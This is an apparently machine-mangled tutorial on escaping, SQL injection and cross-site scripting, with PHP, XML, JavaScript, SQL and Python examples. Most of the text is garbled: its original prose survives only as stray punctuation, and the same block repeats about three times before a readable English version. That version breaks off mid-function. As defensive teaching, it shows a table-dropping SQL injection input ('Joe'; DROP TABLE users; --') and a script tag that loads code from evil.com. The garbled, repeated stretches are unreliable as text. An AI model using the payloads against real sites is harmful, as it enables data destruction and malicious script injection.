SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

So where is the problem? Well, what if the text we want to put between those funny brackets itself contains one of the special symbols? XML is just text, and its rules apply to every character of it, including the characters of our article's contents. Take a sentence such as "if x < n and y > n": the < and > in it look exactly like the start and end of a tag.

Fortunately, the people who designed XML thought of this.

<?xml version="1.0" encoding="UTF-8" ?>
<article>
  <author>Homo Sapiens</author>
  <contents>
    Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y.
  </contents>
</article>


, . "&lt;" "<", "&gt;" - ">".

This trick, replacing a character that would otherwise have special meaning with a sequence that, under the same rules, stands for that character, is called escaping.

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

In other words, we have left the text inside the rules, but made sure the parts that would be mistaken for rules are marked as plain text. Which immediately raises the next question: "and what if I want to write &lt; itself, literally?"

Because the ampersand (&) has now become a special character too. How do we write "&lt;" and have it mean those four characters rather than "<"? XML escapes the ampersand the same way: it becomes "&amp;", so the text "&<" is written as "&amp;&lt;", and the literal four characters "&lt;" come out as "&amp;lt;". The ampersand is escaped first; everything else is left alone.
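An added example (written for this edit, not code from the original article) that shows the ordering rule in running Python: the escape and unescape pair below replaces & first and expands &amp; last, a real XML parser is used to confirm that the text a consumer reads equals what was put in, and the wrong-order version shows how < turns into &amp;lt;. The function names and the sample sentences are constructed for the demo.

```python
import xml.etree.ElementTree as ET

# The three characters XML treats as special inside element content.
# '&' comes first on purpose: the escapes for '<' and '>' introduce an '&'
# that must not be escaped a second time.
XML_ESCAPES = [("&", "&amp;"), ("<", "&lt;"), (">", "&gt;")]


def xml_escape(text):
    """Escape text so it can be placed between XML tags verbatim."""
    for raw, escaped in XML_ESCAPES:
        text = text.replace(raw, escaped)
    return text


def xml_escape_wrong_order(text):
    """Same replacements with '&' handled last: '<' -> '&lt;' -> '&amp;lt;' (a bug)."""
    for raw, escaped in reversed(XML_ESCAPES):
        text = text.replace(raw, escaped)
    return text


def xml_unescape(text):
    """Inverse of xml_escape.  The replacements run in the opposite order, so
    '&amp;' is expanded last and a literal '&lt;' (stored as '&amp;lt;')
    is not turned into '<'."""
    for raw, escaped in reversed(XML_ESCAPES):
        text = text.replace(escaped, raw)
    return text


def build_article(author, contents):
    """The <article> document from the article, with both values escaped."""
    return ("<article><author>%s</author><contents>%s</contents></article>"
            % (xml_escape(author), xml_escape(contents)))


def read_contents(document):
    """Parse with a real XML parser and return the text a consumer sees."""
    return ET.fromstring(document).find("contents").text


if __name__ == "__main__":
    # Constructed samples: the article's sentence, and a sentence that mentions an escape.
    samples = [
        "Basic math tells us that if x < n and y > n, x cannot be larger than y.",
        "In XML the entity for < is written &lt;",
    ]
    for sample in samples:
        doc = build_article("Homo Sapiens", sample)
        print(doc)
        assert read_contents(doc) == sample           # the parser recovers the original
        assert xml_unescape(xml_escape(sample)) == sample
    print(xml_escape("&<"))                           # &amp;&lt;
    print(xml_escape_wrong_order("<"))                # &amp;lt;  (a parser would show '&lt;')
```

The same three-line loop escapes for HTML element content too; Python's standard library offers xml.sax.saxutils.escape and html.escape for this, and they follow the same order.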





XML is not the only "language" with this kind of rule. Here is the same article as JavaScript:

var name = "Homo Sapiens";
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

The quotes mark where a string starts and where it ends; everything between them is text. Pascal's sentence goes in just fine:

var name = "Homo Sapiens";
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

Good! No trouble at all, < and > mean nothing inside a JavaScript string. But what if the text itself contains a quote?

var name = "Homo Sapiens";
var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... and that breaks. The interpreter sees the second quote, decides that the string has ended, and has no idea what to do with the rest. The rules need a way to say "this quote is part of the text", and that way is, again, escaping. In JavaScript (and most languages that look like it) the escape character is the backslash:

var name = "Homo Sapiens";
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

The "\" tells the interpreter that the character after it is text, not a delimiter. Which means that "\" itself has become a special character, and to get a literal backslash you write "\\". Sounds familiar, doesn't it?
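The same rule applied to JavaScript string literals, as an added example in Python (not from the original article): the backslash is escaped before the quote, the wrong order is shown to produce a literal that no longer parses, and the example goes one step beyond the text by also escaping </ so that text containing </script> cannot close an inline script block. Because every escape used is also a valid JSON string escape, json.loads serves as an independent decoder for the round-trip check. Function names and sample strings are assumptions made for the demo.

```python
import json

# Order matters: the backslash is handled first, because every later rule
# *adds* backslashes that must not be escaped a second time.
JS_STRING_ESCAPES = [
    ("\\", "\\\\"),   # \  -> \\
    ('"', '\\"'),     # "  -> \"
    ("\n", "\\n"),
    ("\r", "\\r"),
    ("\t", "\\t"),
    ("</", "<\\/"),   # text containing '</script>' must not be able to end an inline <script>
]


def js_string_literal(text):
    """Return text as a double-quoted JavaScript string literal."""
    for raw, escaped in JS_STRING_ESCAPES:
        text = text.replace(raw, escaped)
    return '"' + text + '"'


def js_string_literal_wrong_order(text):
    """Same rules, backslash handled last: the backslash added for a quote is
    itself escaped, and the resulting literal no longer parses."""
    for raw, escaped in reversed(JS_STRING_ESCAPES):
        text = text.replace(raw, escaped)
    return '"' + text + '"'


def js_decode(literal):
    """Decode a literal produced above.  Every escape used is also a valid JSON
    string escape (JSON permits "\\/"), so json.loads is an independent decoder."""
    return json.loads(literal)


def decodes(literal):
    """True if the literal is one well-formed string and nothing else."""
    try:
        js_decode(literal)
        return True
    except ValueError:
        return False


def render_var(name, value):
    """The 'var contents = "...";' line from the article, built safely."""
    return "var %s = %s;" % (name, js_string_literal(value))


if __name__ == "__main__":
    plato = 'Plato is said to once have said "Lorem ipsum dolor sit amet".'
    print(render_var("contents", plato))
    assert js_decode(js_string_literal(plato)) == plato
    print(js_string_literal("a\\b"))                   # "a\\b"
    print(js_string_literal("</script><script>"))      # "<\/script><script>"
    print(js_string_literal_wrong_order('say "hi"'))   # "say \\"hi\\""  (broken)
    assert not decodes(js_string_literal_wrong_order('say "hi"'))
```

In practice you would let a JSON encoder do this (JSON.stringify in JavaScript, json.dumps in Python) and add the </ rule on top; the point of the hand-written version is to make the order visible.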



Danger!

So far we have only been talking about text we write ourselves. Now remember what was said at the start: some texts are meant for computers and some for people, but they are all still text. And programs mix them all the time. A program takes a piece of text from somewhere (a file, a form a visitor filled in, another program) and puts it inside a text of its own that has rules, for instance an HTML page. From that moment the foreign text is part of the HTML, and if it happens to contain characters that are special in HTML, the browser will treat them as HTML, because nobody told it otherwise.



A concrete example: SQL. SQL is text that follows rules a database understands, for example:

SELECT phone_number FROM users WHERE name = 'Alex'

Works fine. But nobody types queries into the database by hand; a program builds them. In PHP, for example:

$query = "SELECT phone_number FROM users WHERE name = 'Alex'";
$result = mysql_query($query);

Two sets of rules are in play here. The PHP string literal, delimited by the double quotes, and inside it the SQL. As far as PHP is concerned the string is just text; it has no idea it contains SQL. Only when the text arrives at the database is it read as SQL.



Of course, a program that can only look up Alex is not very useful. We want to look up whatever name the visitor typed into the form:

$name = $_POST['name'];
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

And here someone always says: but the user can type anything! Exactly! Anything at all! Which means a stranger is writing into our text, the text with the rules, and the database will apply those rules to whatever arrives!



Look at it once more. $_POST['name'] is text that somebody typed into a form. It is pasted straight into our SQL. SQL has characters with special meaning, and nothing in that code says they should be taken as plain text.



Still not convinced? Here is what the database receives for a few different inputs:



Input: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'

Input: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Input: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

Notice anything? In the second case the name contains a special character, the quote, and the query is no longer valid SQL: the database refuses it with a syntax error. Unpleasant, but at least nothing bad happens. In the last case the query is perfectly valid SQL. Guess what it does...

Yes... the database does exactly what the text says: look up the phone number of Joe, then drop the table users, then ignore the rest of the line (including the stray quote), because -- starts a comment.



This is SQL injection. It has been known for more than 10 years and is still behind a lot of the break-ins you read about. It is not specific to SQL either: any place where a program pastes text from outside into text with rules (HTML, XML, and all the others) has the same problem; SQL is just the example where the damage is easiest to see.



It gets worse!

Another example: XSS, cross-site scripting. It is exactly the same problem, only with HTML instead of SQL.

Imagine a forum: visitors post messages, other visitors read them. Every post is rendered through a template like this one:

<div class="post">
  <p class="meta">
    Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo $post['body']; ?>
  </p>
</div>

For an ordinary post that works beautifully:

<div class="post">
  <p class="meta">
    Posted by Plato on January 2, 15:31
  </p>
  <p class="body">
    I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
  </p>
</div>

Now a post that contains one of HTML's special characters. Browsers are forgiving and will most likely still show it, because a < followed by a space does not look like a tag, but strictly speaking this is already broken HTML:

<div class="post">
  <p class="meta">
    Posted by Pascal on November 23, 04:12
  </p>
  <p class="body">
    Basic math tells us that if x < n and y > n, x cannot be larger than y.
  </p>
</div>

... and so on. Now, what happens when someone posts this?



<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
  </p>
</div>

See it? The post body was pasted into the page as HTML, so the browser does what HTML tells it to do: it loads and runs a script from evil.com, in the browser of every visitor who opens the page. The attacker's text is now part of our page, and the script can do whatever its author wants there.





The mistake is exactly the same as in the SQL example: text from somewhere else was pasted into text with rules, and the rules were not taken into account. So how do we fix it?



The fix? You already know it. What did XML do with the < in our article? Escaped it! Before pasting foreign text into a text with rules, every character that is special under those rules has to be escaped.

Back to the SQL example. PHP comes with a function that does exactly this for MySQL:

$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

It replaces every character that is special to MySQL with its escaped form (a quote becomes \', a backslash becomes \\, and so on). The database now receives:

Input: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'

Input: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Input: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string knows the MySQL rules, so whatever the visitor typed is plain text again as far as the database is concerned. Two caveats worth remembering: the escaping only protects a value that sits inside quotes (a bare number pasted into the query still has to be validated as a number), and the function needs an open connection, because the right escaping depends on the connection's character set. The whole mysql_* extension was removed in PHP 7; with mysqli or PDO the same idea is mysqli_real_escape_string() or PDO::quote(), but prepared statements, described further down, are the better tool.



And the same for HTML:

<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body']); ?>
  </p>
</div>

htmlspecialchars replaces the characters that are special in HTML (<, >, &, and the quotes) with their entities. The JackTR post now comes out as:

<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
  </p>
</div>

The browser shows the text of the script tag instead of running it: it became "just text" again, because HTML has now been told which characters to take literally. One caveat: before PHP 8.1, htmlspecialchars leaves the single quote alone unless you pass ENT_QUOTES, so for values that end up inside attribute values call it as htmlspecialchars($s, ENT_QUOTES, 'UTF-8').
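As an added example (not from the original article) for the forum template and the htmlspecialchars fix above: the template rendered unsafely and safely in Python, with a real HTML parser used to show what a browser would make of each result. html.escape plays the role of htmlspecialchars with ENT_QUOTES. Function names and the post data are constructed for the demo.

```python
import html
from html.parser import HTMLParser

# The forum template from the article, as a Python format string.
TEMPLATE = ('<div class="post">'
            '<p class="meta">Posted by {username} on {date}</p>'
            '<p class="body">{body}</p>'
            '</div>')


def render_unsafe(post):
    """The original template: values are pasted into the HTML as they are."""
    return TEMPLATE.format(**post)


def render_safe(post):
    """Every value is escaped for HTML before it is pasted.  quote=True also
    escapes '"' and "'" (what ENT_QUOTES does for htmlspecialchars), so the
    result is usable inside a quoted attribute value as well."""
    return TEMPLATE.format(**{k: html.escape(str(v), quote=True) for k, v in post.items()})


class BrowserView(HTMLParser):
    """Collects the start tags and the text a browser's parser would produce."""

    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities are turned back into text
        self.tags = []
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        self.chunks.append(data)


def parse(markup):
    """Return (start tags, concatenated text) for the markup."""
    view = BrowserView()
    view.feed(markup)
    view.close()
    return view.tags, "".join(view.chunks)


def loads_script(markup):
    """True if a browser would see a <script> element in the markup."""
    return "script" in parse(markup)[0]


if __name__ == "__main__":
    # Constructed posts, taken from the article's examples.
    pascal = {"username": "Pascal", "date": "November 23, 04:12",
              "body": "Basic math tells us that if x < n and y > n, x cannot be larger than y."}
    jacktr = {"username": "JackTR", "date": "July 18, 12:56",
              "body": '<script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>'}

    print(render_safe(jacktr))
    assert loads_script(render_unsafe(jacktr))       # pasted as HTML: a script element
    assert not loads_script(render_safe(jacktr))     # escaped: the browser shows the text
    assert jacktr["body"] in parse(render_safe(jacktr))[1]
    assert pascal["body"] in parse(render_safe(pascal))[1]   # '<' survives the round trip
```

The parser check is the useful part: it shows that escaping does not lose anything (Pascal's < comes back as <), it only stops the browser from reading the post as markup.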



But...

Remember one thing: escape for the right rules, and escape at the right moment. When text goes into SQL, escape it for SQL. When it goes into HTML, escape it for HTML. Not earlier (escaping a value when it comes in from the form and then storing it leaves you with text that is right for one destination and wrong for every other), and not twice (escaping a value that is already escaped shows the escape sequences themselves on the page). Escape exactly once, exactly where the text crosses into the other rules.





Escaping is not the only technique, and it is worth knowing how the others relate to it:

Validation

Checking that the input is what you expected. If you asked for an age, "DROP TABLE users" is not an age, but "42" is, and the rest can be rejected outright. Validation does not replace escaping, though: a perfectly valid value can still contain characters that are special to HTML or SQL (Mc'Donalds is a valid name), so valid input still has to be escaped when it is pasted somewhere. Validation and escaping complement each other.

Sanitization

Removing from the input what you do not want in it, for instance stripping HTML tags out of a comment. This is another way of keeping "foreign" text harmless, but it has to be done with the same knowledge of the rules, and it changes the data. Again a complement to escaping, not a replacement for it.

Prepared SQL statements

The real solution for SQL, when the database and the driver support it: send the SQL text and the values to the database separately, so that the two never get mixed into one text in the first place. In PHP with PDO:

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute(array($_POST['name']));   // execute() takes an array of parameter values

The query and the parameters travel to the database as two separate things; the name is never interpreted as SQL, whatever it contains. Where prepared statements are available, use them instead of escaping: they solve the problem rather than patching it.
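An added example (not from the original article) that runs the SQL section's three inputs, the escaping fix, and the prepared statement against an in-memory SQLite database, so that the three outcomes (a result, a syntax error, a dropped table) can be seen rather than imagined. SQLite stands in for MySQL; its quote escaping is '' rather than \', which is exactly the dialect dependence that ties escaping to the connection. The table contents, the function names and the database itself are constructed for the demo.

```python
import sqlite3

ATTACK = "Joe'; DROP TABLE users; --"   # the article's last input


def fresh_db():
    """An in-memory database with the article's users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (name TEXT, phone_number TEXT);"
        "INSERT INTO users VALUES ('Alex', '111'), ('Mc''Donalds', '222'), ('Joe', '333');"
    )
    return conn


def users_table_exists(conn):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'users'").fetchone()
    return row is not None


def lookup_concat(conn, name):
    """Vulnerable: the name is pasted into the SQL text, as in the PHP example.
    sqlite3's execute() refuses a text holding more than one statement, which
    would hide the bug rather than fix it, so in that case the text is run with
    executescript(), which behaves like a server that executes everything it is
    sent.  Rows of the first statement are not available on that path."""
    sql = "SELECT phone_number FROM users WHERE name = '%s'" % name
    try:
        return conn.execute(sql).fetchall()
    except (sqlite3.Warning, sqlite3.ProgrammingError):   # "only one statement at a time"
        conn.executescript(sql)
        return None


def lookup_escaped(conn, name):
    """Escaping, the article's first fix.  SQLite (and standard SQL) escape a
    quote by doubling it; MySQL's mysql_real_escape_string emits \\' instead.
    The escape form depends on the database, and it only protects a value
    that sits inside quotes."""
    sql = "SELECT phone_number FROM users WHERE name = '%s'" % name.replace("'", "''")
    return conn.execute(sql).fetchall()


def lookup_param(conn, name):
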